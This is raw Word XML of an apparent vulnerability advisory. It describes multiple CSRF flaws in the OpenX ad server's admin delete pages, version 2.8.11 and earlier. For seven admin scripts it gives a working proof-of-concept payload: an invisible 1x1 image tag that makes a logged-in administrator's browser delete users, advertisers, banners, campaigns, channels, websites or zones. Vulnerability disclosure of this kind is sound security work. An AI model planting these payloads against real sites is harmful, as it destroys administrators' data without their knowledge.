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7B0" w:rsidRDefault="00611547" w:rsidP="009D14C6">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Multiple cross-site request forgery (CSRF) vulnerabilities in </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK11"/>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK12"/>
      <w:r>
        <w:t>OpenX 2.8.1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidR="009D14C6">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00CA27B0">
        <w:t xml:space="preserve"> and earlier allows remote attackers to hijack the authentication of administrators for requests that </w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r w:rsidR="00F9355F">
        <w:t xml:space="preserve"> (1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r w:rsidR="00F027D8">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F9355F">
        <w:t xml:space="preserve"> (2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="00611547">
        <w:t>dvertiser</w:t>
      </w:r>
      <w:r w:rsidR="00F027D8">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F9355F">
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r>
        <w:t>banner</w:t>
      </w:r>
      <w:r w:rsidR="00F027D8">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F9355F">
        <w:t xml:space="preserve">(4) </w:t>
      </w:r>
      <w:r w:rsidRPr="00611547">
        <w:t>campaign</w:t>
      </w:r>
      <w:r w:rsidR="00F027D8">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F9355F">
        <w:t xml:space="preserve">(5) </w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00611547">
        <w:t>hannel</w:t>
      </w:r>
      <w:r w:rsidR="00F027D8">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F9355F">
        <w:t xml:space="preserve">(6) </w:t>
      </w:r>
      <w:r>
        <w:t>website</w:t>
      </w:r>
      <w:r w:rsidR="00F027D8">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9355F">
        <w:t>or (7)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zone</w:t>
      </w:r>
      <w:r w:rsidR="00F027D8">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00AE0575">
        <w:t xml:space="preserve"> via delete actions</w:t>
      </w:r>
      <w:r w:rsidR="00CA27B0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F027D8" w:rsidRDefault="00F027D8" w:rsidP="00F027D8">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="MediumShading1-Accent11"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9576"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E93B03" w:rsidTr="008008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93B03" w:rsidRDefault="00E93B03" w:rsidP="00800829">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E93B03" w:rsidRDefault="00E93B03" w:rsidP="00800829">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Application: </w:t>
            </w:r>
            <w:r w:rsidR="00611547" w:rsidRPr="00611547">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>OpenX 2.8.10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E93B03" w:rsidRDefault="00E93B03" w:rsidP="00800829">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Home Page Address:</w:t>
            </w:r>
            <w:r w:rsidR="00611547">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00611547" w:rsidRPr="00611547">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>http://www.openx.com/</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E93B03" w:rsidRDefault="00E93B03" w:rsidP="00800829">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E93B03" w:rsidTr="00800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93B03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</w:p>
          <w:p w:rsidR="00E93B03" w:rsidRPr="00753074" w:rsidRDefault="00E93B03" w:rsidP="00753074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File</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA27EC">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="003161A6" w:rsidRPr="00BE3082">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>admin/agency-user-unlink.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E93B03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</w:p>
          <w:p w:rsidR="00E93B03" w:rsidRPr="00435BC3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POC:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003161A6" w:rsidRPr="003161A6" w:rsidRDefault="003161A6" w:rsidP="003161A6">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003161A6">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>&lt;img src=</w:t>
            </w:r>
            <w:bookmarkStart w:id="2" w:name="OLE_LINK14"/>
            <w:bookmarkStart w:id="3" w:name="OLE_LINK15"/>
            <w:r w:rsidRPr="003161A6">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>'http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>site</w:t>
            </w:r>
            <w:r w:rsidRPr="003161A6">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/admin/agency-user-unlink.php?agencyid=1&amp;userid=18</w:t>
            </w:r>
            <w:bookmarkEnd w:id="2"/>
            <w:bookmarkEnd w:id="3"/>
            <w:r w:rsidRPr="003161A6">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>' width="1" height="1" border="0"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003161A6" w:rsidRDefault="003161A6" w:rsidP="003161A6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E93B03" w:rsidTr="008008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93B03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</w:p>
          <w:p w:rsidR="00E93B03" w:rsidRPr="00753074" w:rsidRDefault="00E93B03" w:rsidP="00753074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File: </w:t>
            </w:r>
            <w:r w:rsidR="003161A6" w:rsidRPr="00BE3082">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>admin/advertiser-delete.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E93B03" w:rsidRDefault="00E93B03" w:rsidP="00800829">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E93B03" w:rsidRPr="00DA27EC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>POC:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003161A6" w:rsidRPr="003161A6" w:rsidRDefault="003161A6" w:rsidP="00C95944">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003161A6">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>&lt;img src='</w:t>
            </w:r>
            <w:bookmarkStart w:id="4" w:name="OLE_LINK16"/>
            <w:bookmarkStart w:id="5" w:name="OLE_LINK17"/>
            <w:r w:rsidRPr="003161A6">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r w:rsidR="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>site</w:t>
            </w:r>
            <w:r w:rsidRPr="003161A6">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/admin/advertiser-delete.php?clientid=10' </w:t>
            </w:r>
            <w:bookmarkEnd w:id="4"/>
            <w:bookmarkEnd w:id="5"/>
            <w:r w:rsidRPr="003161A6">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>width="1" height="1" border="0"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E93B03" w:rsidRDefault="00E93B03" w:rsidP="00800829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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B0677F" w:rsidTr="00800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B0677F" w:rsidRDefault="00B0677F" w:rsidP="00B0677F">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B0677F" w:rsidRPr="00753074" w:rsidRDefault="00B0677F" w:rsidP="00753074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File: </w:t>
            </w:r>
            <w:r w:rsidR="00C95944" w:rsidRPr="00BE3082">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>admin/banner-delete.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B0677F" w:rsidRDefault="00B0677F" w:rsidP="00B0677F">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B0677F" w:rsidRPr="00DA27EC" w:rsidRDefault="00B0677F" w:rsidP="00B0677F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>POC:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRPr="00C95944" w:rsidRDefault="00C95944" w:rsidP="00B461FF">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>&lt;img src='http://</w:t>
            </w:r>
            <w:r w:rsidR="00B461FF">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>site</w:t>
            </w:r>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/admin/banner-delete.php?clientid=2&amp;campaignid=7&amp;bannerid=16' width="1" height="1" border="0"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B0677F" w:rsidRDefault="00B0677F" w:rsidP="00800829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B0677F" w:rsidTr="008008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B0677F" w:rsidRDefault="00B0677F" w:rsidP="00B0677F">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B0677F" w:rsidRPr="00DA27EC" w:rsidRDefault="00B0677F" w:rsidP="00B0677F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File: </w:t>
            </w:r>
            <w:r w:rsidR="00C95944" w:rsidRPr="00BE3082">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>admin/campaign-delete.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B0677F" w:rsidRDefault="00B0677F" w:rsidP="00B0677F">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B0677F" w:rsidRPr="00DA27EC" w:rsidRDefault="00B0677F" w:rsidP="00B0677F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>POC:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRPr="00C95944" w:rsidRDefault="00C95944" w:rsidP="00D45441">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>&lt;img src='http://</w:t>
            </w:r>
            <w:r w:rsidR="00D45441">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>site</w:t>
            </w:r>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:bookmarkStart w:id="6" w:name="OLE_LINK18"/>
            <w:bookmarkStart w:id="7" w:name="OLE_LINK19"/>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">admin/campaign-delete.php?clientid=2&amp;campaignid=11' </w:t>
            </w:r>
            <w:bookmarkEnd w:id="6"/>
            <w:bookmarkEnd w:id="7"/>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>width="1" height="1" border="0"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B0677F" w:rsidRDefault="00B0677F" w:rsidP="00800829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C95944" w:rsidTr="00800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C95944" w:rsidRDefault="00C95944" w:rsidP="00C95944">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRPr="00753074" w:rsidRDefault="00C95944" w:rsidP="00753074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File: </w:t>
            </w:r>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>admin/channel-delete.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRDefault="00C95944" w:rsidP="00C95944">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRPr="00DA27EC" w:rsidRDefault="00C95944" w:rsidP="00C95944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>POC:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRPr="00C95944" w:rsidRDefault="00C95944" w:rsidP="00310B35">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>&lt;img src='http://</w:t>
            </w:r>
            <w:r w:rsidR="00310B35">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>site</w:t>
            </w:r>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/admin/channel-delete.php?affiliateid=1&amp;channelid=6' width="1" height="1" border="0"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRDefault="00C95944" w:rsidP="00C95944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C95944" w:rsidTr="008008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C95944" w:rsidRDefault="00C95944" w:rsidP="00C95944">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRPr="00753074" w:rsidRDefault="00C95944" w:rsidP="00753074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File: </w:t>
            </w:r>
            <w:r w:rsidRPr="00BE3082">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>admin/affiliate-delete.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRDefault="00C95944" w:rsidP="00C95944">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRPr="00DA27EC" w:rsidRDefault="00C95944" w:rsidP="00C95944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>POC:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRPr="00C95944" w:rsidRDefault="00C95944" w:rsidP="00784304">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>&lt;img src='http://</w:t>
            </w:r>
            <w:r w:rsidR="00784304">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>site</w:t>
            </w:r>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/admin/affiliate-delete.php?affiliateid=9' width="1" height="1" border="0"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRDefault="00C95944" w:rsidP="00B0677F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C95944" w:rsidTr="00800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C95944" w:rsidRDefault="00C95944" w:rsidP="00C95944">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRPr="00DA27EC" w:rsidRDefault="00C95944" w:rsidP="00C95944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File: </w:t>
            </w:r>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>admin/zone-delete.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRDefault="00C95944" w:rsidP="00C95944">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="8" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="8"/>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRPr="00DA27EC" w:rsidRDefault="00C95944" w:rsidP="00C95944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>POC:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRPr="00C95944" w:rsidRDefault="00C95944" w:rsidP="00C91622">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>&lt;img src='http://</w:t>
            </w:r>
            <w:r w:rsidR="00C91622">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>site</w:t>
            </w:r>
            <w:r w:rsidRPr="00C95944">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/admin/zone-delete.php?affiliateid=1&amp;zoneid=11' width="1" height="1" border="0"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C95944" w:rsidRDefault="00C95944" w:rsidP="00B0677F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</w:tbl>
    <w:p w:rsidR="00E93B03" w:rsidRDefault="00E93B03" w:rsidP="00E93B03">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E93B03" w:rsidSect="004877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CC5" w:rsidRDefault="00C90CC5" w:rsidP="00D34775">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C90CC5" w:rsidRDefault="00C90CC5" w:rsidP="00D34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CC5" w:rsidRDefault="00C90CC5" w:rsidP="00D34775">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C90CC5" w:rsidRDefault="00C90CC5" w:rsidP="00D347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55F"/>
    <w:rsid w:val="00053DEB"/>
    <w:rsid w:val="000F5CED"/>
    <w:rsid w:val="001111D8"/>
    <w:rsid w:val="00143E24"/>
    <w:rsid w:val="00155C91"/>
    <w:rsid w:val="00163EF1"/>
    <w:rsid w:val="0018182E"/>
    <w:rsid w:val="001B47AF"/>
    <w:rsid w:val="001B687F"/>
    <w:rsid w:val="001E2F80"/>
    <w:rsid w:val="00225A6D"/>
    <w:rsid w:val="00225CDA"/>
    <w:rsid w:val="0023324C"/>
    <w:rsid w:val="0024106A"/>
    <w:rsid w:val="00252634"/>
    <w:rsid w:val="003013DC"/>
    <w:rsid w:val="00310B35"/>
    <w:rsid w:val="003114AB"/>
    <w:rsid w:val="003161A6"/>
    <w:rsid w:val="00386272"/>
    <w:rsid w:val="003912C4"/>
    <w:rsid w:val="003B3693"/>
    <w:rsid w:val="003F0235"/>
    <w:rsid w:val="003F1B9E"/>
    <w:rsid w:val="004026DF"/>
    <w:rsid w:val="00412BBD"/>
    <w:rsid w:val="00436A8C"/>
    <w:rsid w:val="00464625"/>
    <w:rsid w:val="00487705"/>
    <w:rsid w:val="004878A3"/>
    <w:rsid w:val="00491EFF"/>
    <w:rsid w:val="004A2D77"/>
    <w:rsid w:val="004D19C6"/>
    <w:rsid w:val="00507508"/>
    <w:rsid w:val="00510BA0"/>
    <w:rsid w:val="00515C17"/>
    <w:rsid w:val="0055155F"/>
    <w:rsid w:val="005A14D7"/>
    <w:rsid w:val="005C4954"/>
    <w:rsid w:val="00611547"/>
    <w:rsid w:val="00681551"/>
    <w:rsid w:val="006D1BA6"/>
    <w:rsid w:val="006F4700"/>
    <w:rsid w:val="00727863"/>
    <w:rsid w:val="00742A31"/>
    <w:rsid w:val="00751D69"/>
    <w:rsid w:val="00753074"/>
    <w:rsid w:val="007617E6"/>
    <w:rsid w:val="00782C3A"/>
    <w:rsid w:val="00784304"/>
    <w:rsid w:val="007D36E6"/>
    <w:rsid w:val="007F4D01"/>
    <w:rsid w:val="008D488B"/>
    <w:rsid w:val="008E58DE"/>
    <w:rsid w:val="00940E90"/>
    <w:rsid w:val="00942C5A"/>
    <w:rsid w:val="009578E3"/>
    <w:rsid w:val="0098226D"/>
    <w:rsid w:val="009D14C6"/>
    <w:rsid w:val="009E0413"/>
    <w:rsid w:val="00A32C2A"/>
    <w:rsid w:val="00A6697F"/>
    <w:rsid w:val="00AE0575"/>
    <w:rsid w:val="00AE2A36"/>
    <w:rsid w:val="00AE7A3A"/>
    <w:rsid w:val="00B0677F"/>
    <w:rsid w:val="00B461FF"/>
    <w:rsid w:val="00B51EC6"/>
    <w:rsid w:val="00B844C4"/>
    <w:rsid w:val="00B90310"/>
    <w:rsid w:val="00BB6AB2"/>
    <w:rsid w:val="00BB7AE6"/>
    <w:rsid w:val="00C1647C"/>
    <w:rsid w:val="00C31ACB"/>
    <w:rsid w:val="00C90CC5"/>
    <w:rsid w:val="00C91622"/>
    <w:rsid w:val="00C95944"/>
    <w:rsid w:val="00CA27B0"/>
    <w:rsid w:val="00D34775"/>
    <w:rsid w:val="00D45441"/>
    <w:rsid w:val="00DC4A71"/>
    <w:rsid w:val="00E02E72"/>
    <w:rsid w:val="00E20410"/>
    <w:rsid w:val="00E445F0"/>
    <w:rsid w:val="00E54B77"/>
    <w:rsid w:val="00E62711"/>
    <w:rsid w:val="00E764FD"/>
    <w:rsid w:val="00E847D6"/>
    <w:rsid w:val="00E93B03"/>
    <w:rsid w:val="00EC546E"/>
    <w:rsid w:val="00ED5826"/>
    <w:rsid w:val="00ED79F9"/>
    <w:rsid w:val="00F027D8"/>
    <w:rsid w:val="00F203A9"/>
    <w:rsid w:val="00F471C2"/>
    <w:rsid w:val="00F739AF"/>
    <w:rsid w:val="00F80E0A"/>
    <w:rsid w:val="00F9355F"/>
    <w:rsid w:val="00FC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9B03144-4270-4AAE-BDE1-28AAEAD9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BBD"/>
    <w:pPr>
      <w:bidi/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="B Nazanin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3">
    <w:name w:val="Light Grid Accent 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="62"/>
    <w:rsid w:val="004D19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D1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9C6"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="filename">
    <w:name w:val="filename"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-comment">
    <w:name w:val="phps-t-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-variable-marked">
    <w:name w:val="phps-t-variable-marked"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-variable">
    <w:name w:val="phps-t-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-code">
    <w:name w:val="phps-code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004878A3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-constant-encapsed-string">
    <w:name w:val="phps-t-constant-encapsed-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004878A3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D34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4775"/>
    <w:rPr>
